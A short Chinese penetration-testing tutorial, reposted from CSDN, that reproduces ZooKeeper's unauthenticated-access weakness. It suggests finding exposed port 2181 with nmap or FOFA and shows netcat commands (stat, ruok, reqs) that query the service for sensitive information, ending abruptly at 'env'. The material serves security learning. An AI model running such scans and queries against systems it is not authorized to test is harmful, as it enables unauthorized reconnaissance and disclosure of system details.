0


web渗透测试漏洞复现:ZooKeeper未授权漏洞复现

web渗透测试漏洞复现

1. ZooKeeper未授权漏洞复现

1.1 ZooKeeper简介

ZooKeeper 是一个分布式的、开源的协调服务,最初由雅虎开发,现隶属于 Apache 软件基金会,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件,旨在为大型分布式系统提供一致性的服务。ZooKeeper 的设计目的是简化分布式应用程序的开发和维护,它通过提供一组简单易用的原语和数据模型,为分布式系统中的进程提供协作服务。
ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。

1.2 ZooKeeper漏洞复现

1.使用nmap或者fofa扫描发现端口2181或者服务

2.使用基本命令格式:echo 命令|nc 目标ip 目标端口

stat:列出关于性能和连接的客户端的统计信息。
echo stat | nc 127.0.0.1 2181

ruok:测试服务器是否运行在非错误状态。
echo ruok | nc 127.0.0.1 2181

reqs:列出未完成的请求。
echo reqs | nc 127.0.0.1 2181

env

本文转载自: https://blog.csdn.net/qq_43422402/article/details/137123789
版权归原作者 HACKNOE 所有, 如有侵权,请联系我们删除。

“web渗透测试漏洞复现:ZooKeeper未授权漏洞复现”的评论:

还没有评论